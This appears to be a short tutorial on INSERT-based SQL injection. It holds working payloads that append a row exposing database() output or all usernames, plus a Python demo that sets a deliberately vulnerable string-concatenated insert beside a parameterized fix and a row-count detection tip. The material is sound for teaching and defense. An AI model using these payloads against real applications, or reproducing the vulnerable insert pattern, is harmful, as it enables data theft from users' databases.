Insert-based SQLi


Most SQL queries are SELECT statements, but we sometimes encounter injectable INSERT, UPDATE, and DELETE statements as well.

An injectable INSERT can be abused to add records whose content carries exfiltrated data. For instance, assume there is a SQLi in the function that adds comments to the following table:

create table comment
(
    id int auto_increment primary key,
    content text not null
);

We can extract data by breaking out of the quoted value and appending a second record whose content is computed by a subquery; the extracted data then shows up as an ordinary comment.

-INSERT INTO comment(content) VALUES ('a')
+INSERT INTO comment(content) VALUES ('a'), (database())-- -'
+INSERT INTO comment(content) VALUES ('a'), ((SELECT group_concat(username) from membres))-- -'
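Added example (not code from the original page): a minimal Python/sqlite3 reproduction of the vulnerable comment insert next to a parameterized version, fed the page's payload shape. SQLite has no database(), so the page's group_concat subquery is used as the injected value, and the membres table and its rows are constructed here.

```python
import sqlite3

# Constructed demo schema: the page's `comment` table plus a small `membres`
# table standing in for the one the page's second payload reads from.
SCHEMA = """
CREATE TABLE comment (id INTEGER PRIMARY KEY AUTOINCREMENT, content TEXT NOT NULL);
CREATE TABLE membres (username TEXT NOT NULL);
INSERT INTO membres(username) VALUES ('alice'), ('bob');
"""

# Payload shape taken from the page: close the literal and the row,
# append a second VALUES row, comment out the rest of the statement.
PAYLOAD = "a'), ((SELECT group_concat(username) FROM membres))-- -"


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def add_comment_vulnerable(conn, content):
    # String concatenation: the quote and parenthesis in the input end the
    # literal, so the attacker's extra VALUES row becomes part of the INSERT.
    cur = conn.execute(f"INSERT INTO comment(content) VALUES ('{content}')")
    conn.commit()
    return cur.rowcount  # a single-comment insert should affect exactly 1 row


def add_comment_safe(conn, content):
    # Parameterized: the whole input is bound as one literal value, so the
    # same payload is stored verbatim as the comment text.
    cur = conn.execute("INSERT INTO comment(content) VALUES (?)", (content,))
    conn.commit()
    return cur.rowcount


def stored_comments(conn):
    return [row[0] for row in conn.execute("SELECT content FROM comment ORDER BY id")]


def demo(add_fn, content=PAYLOAD):
    # Returns (rows affected, stored comment texts) for the given insert function.
    conn = new_db()
    affected = add_fn(conn, content)
    return affected, stored_comments(conn)
```

The affected-row count is a cheap application-side check: an insert of one comment that reports more than one row changed is a strong signal of this attack.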